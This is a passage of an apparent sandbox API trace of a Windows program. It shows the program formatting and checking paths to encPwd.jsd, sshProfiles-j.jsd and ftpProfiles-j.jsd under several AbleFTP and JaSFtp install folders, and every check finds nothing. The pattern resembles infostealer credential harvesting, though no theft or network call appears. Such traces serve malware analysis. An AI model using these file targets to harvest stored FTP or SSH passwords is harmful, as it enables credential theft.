(x86)\\AbleFTP8\\encPwd.jsd") returned 0 [0243.783] GetProcessHeap () returned 0x740000 [0243.783] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.783] GetProcessHeap () returned 0x740000 [0243.783] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.784] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.784] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 63 [0243.785] GetProcessHeap () returned 0x740000 [0243.785] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0243.785] GetProcessHeap () returned 0x740000 [0243.785] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.786] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0243.787] GetProcessHeap () returned 0x740000 [0243.787] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.922] GetProcessHeap () returned 0x740000 [0243.922] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.923] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.925] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0243.925] GetProcessHeap () returned 0x740000 [0243.925] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0243.925] GetProcessHeap () returned 0x740000 [0243.925] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.927] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0243.927] GetProcessHeap () returned 0x740000 [0243.927] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.927] GetProcessHeap () returned 0x740000 [0243.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0243.928] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.929] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 42 [0243.929] GetProcessHeap () returned 0x740000 [0243.929] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a488 [0243.929] GetProcessHeap () returned 0x740000 [0243.929] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.931] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 0 [0243.931] GetProcessHeap () returned 0x740000 [0243.931] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.931] GetProcessHeap () returned 0x740000 [0243.931] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.932] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.932] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 63 [0243.932] GetProcessHeap () returned 0x740000 [0243.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0243.932] GetProcessHeap () returned 0x740000 [0243.933] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.964] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0243.964] GetProcessHeap () returned 0x740000 [0243.965] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.965] GetProcessHeap () returned 0x740000 [0243.965] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.966] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.966] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0243.966] GetProcessHeap () returned 0x740000 [0243.966] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0243.966] GetProcessHeap () returned 0x740000 [0243.967] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.968] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0243.968] GetProcessHeap () returned 0x740000 [0243.968] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.968] GetProcessHeap () returned 0x740000 [0243.968] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0243.969] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.970] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 43 [0243.970] GetProcessHeap () returned 0x740000 [0243.970] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x75a488 [0243.970] GetProcessHeap () returned 0x740000 [0243.970] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.971] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 0 [0243.972] GetProcessHeap () returned 0x740000 [0243.972] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.972] GetProcessHeap () returned 0x740000 [0243.972] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.973] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.973] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 64 [0243.973] GetProcessHeap () returned 0x740000 [0243.973] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0243.973] GetProcessHeap () returned 0x740000 [0243.974] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.975] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0243.975] GetProcessHeap () returned 0x740000 [0243.975] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.976] GetProcessHeap () returned 0x740000 [0243.976] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.977] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.978] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0243.978] GetProcessHeap () returned 0x740000 [0243.978] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0243.978] GetProcessHeap () returned 0x740000 [0243.978] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.980] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0243.980] GetProcessHeap () returned 0x740000 [0243.980] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.980] GetProcessHeap () returned 0x740000 [0243.981] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0243.982] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.983] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 43 [0243.983] GetProcessHeap () returned 0x740000 [0243.983] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x75a488 [0243.983] GetProcessHeap () returned 0x740000 [0243.983] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.984] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 0 [0243.984] GetProcessHeap () returned 0x740000 [0243.985] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.985] GetProcessHeap () returned 0x740000 [0243.985] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.986] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.987] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 64 [0243.987] GetProcessHeap () returned 0x740000 [0243.987] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0243.987] GetProcessHeap () returned 0x740000 [0243.987] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.037] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.037] GetProcessHeap () returned 0x740000 [0244.037] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.038] GetProcessHeap () returned 0x740000 [0244.038] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.038] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.039] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0244.039] GetProcessHeap () returned 0x740000 [0244.039] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.039] GetProcessHeap () returned 0x740000 [0244.039] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.040] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.041] GetProcessHeap () returned 0x740000 [0244.041] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.041] GetProcessHeap () returned 0x740000 [0244.041] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.107] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.108] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 43 [0244.108] GetProcessHeap () returned 0x740000 [0244.108] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x75a488 [0244.108] GetProcessHeap () returned 0x740000 [0244.109] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.110] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 0 [0244.111] GetProcessHeap () returned 0x740000 [0244.111] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.111] GetProcessHeap () returned 0x740000 [0244.111] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.112] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.113] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 64 [0244.113] GetProcessHeap () returned 0x740000 [0244.113] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.113] GetProcessHeap () returned 0x740000 [0244.113] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.114] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.114] GetProcessHeap () returned 0x740000 [0244.114] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.114] GetProcessHeap () returned 0x740000 [0244.114] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.115] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.116] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0244.116] GetProcessHeap () returned 0x740000 [0244.116] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.116] GetProcessHeap () returned 0x740000 [0244.116] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.118] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.118] GetProcessHeap () returned 0x740000 [0244.118] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.119] GetProcessHeap () returned 0x740000 [0244.119] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.120] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.121] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 43 [0244.121] GetProcessHeap () returned 0x740000 [0244.121] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x75a488 [0244.121] GetProcessHeap () returned 0x740000 [0244.121] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.122] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 0 [0244.122] GetProcessHeap () returned 0x740000 [0244.123] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.123] GetProcessHeap () returned 0x740000 [0244.123] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.128] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.129] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 64 [0244.129] GetProcessHeap () returned 0x740000 [0244.129] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.129] GetProcessHeap () returned 0x740000 [0244.129] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.131] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.131] GetProcessHeap () returned 0x740000 [0244.131] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.131] GetProcessHeap () returned 0x740000 [0244.131] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.132] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.133] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0244.133] GetProcessHeap () returned 0x740000 [0244.133] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.133] GetProcessHeap () returned 0x740000 [0244.133] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.134] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.135] GetProcessHeap () returned 0x740000 [0244.135] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.135] GetProcessHeap () returned 0x740000 [0244.135] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.136] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.146] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 43 [0244.146] GetProcessHeap () returned 0x740000 [0244.146] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x75a488 [0244.146] GetProcessHeap () returned 0x740000 [0244.146] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.148] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 0 [0244.148] GetProcessHeap () returned 0x740000 [0244.149] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.206] GetProcessHeap () returned 0x740000 [0244.206] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.207] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.208] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 64 [0244.208] GetProcessHeap () returned 0x740000 [0244.208] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.208] GetProcessHeap () returned 0x740000 [0244.208] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.209] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.209] GetProcessHeap () returned 0x740000 [0244.210] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.210] GetProcessHeap () returned 0x740000 [0244.210] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.210] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.211] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0244.211] GetProcessHeap () returned 0x740000 [0244.211] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.211] GetProcessHeap () returned 0x740000 [0244.212] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.213] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.213] GetProcessHeap () returned 0x740000 [0244.213] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.213] GetProcessHeap () returned 0x740000 [0244.213] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.214] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.215] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 41 [0244.215] GetProcessHeap () returned 0x740000 [0244.215] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x56) returned 0x75a488 [0244.215] GetProcessHeap () returned 0x740000 [0244.215] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.217] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 0 [0244.218] GetProcessHeap () returned 0x740000 [0244.218] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.219] GetProcessHeap () returned 0x740000 [0244.219] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.220] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.221] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 62 [0244.221] GetProcessHeap () returned 0x740000 [0244.221] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75a488 [0244.221] GetProcessHeap () returned 0x740000 [0244.222] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.223] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.223] GetProcessHeap () returned 0x740000 [0244.223] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.223] GetProcessHeap () returned 0x740000 [0244.223] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.225] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.289] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0244.289] GetProcessHeap () returned 0x740000 [0244.290] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75a488 [0244.290] GetProcessHeap () returned 0x740000 [0244.290] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.291] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.291] GetProcessHeap () returned 0x740000 [0244.291] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.295] GetProcessHeap () returned 0x740000 [0244.295] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.295] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.296] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 41 [0244.296] GetProcessHeap () returned 0x740000 [0244.296] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x56) returned 0x75a488 [0244.296] GetProcessHeap () returned 0x740000 [0244.297] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.299] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 0 [0244.300] GetProcessHeap () returned 0x740000 [0244.301] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.301] GetProcessHeap () returned 0x740000 [0244.301] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.301] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.302] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 62 [0244.302] GetProcessHeap () returned 0x740000 [0244.302] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75a488 [0244.302] GetProcessHeap () returned 0x740000 [0244.302] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.306] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.310] GetProcessHeap () returned 0x740000 [0244.310] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.311] GetProcessHeap () returned 0x740000 [0244.311] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.312] LoadLibraryW 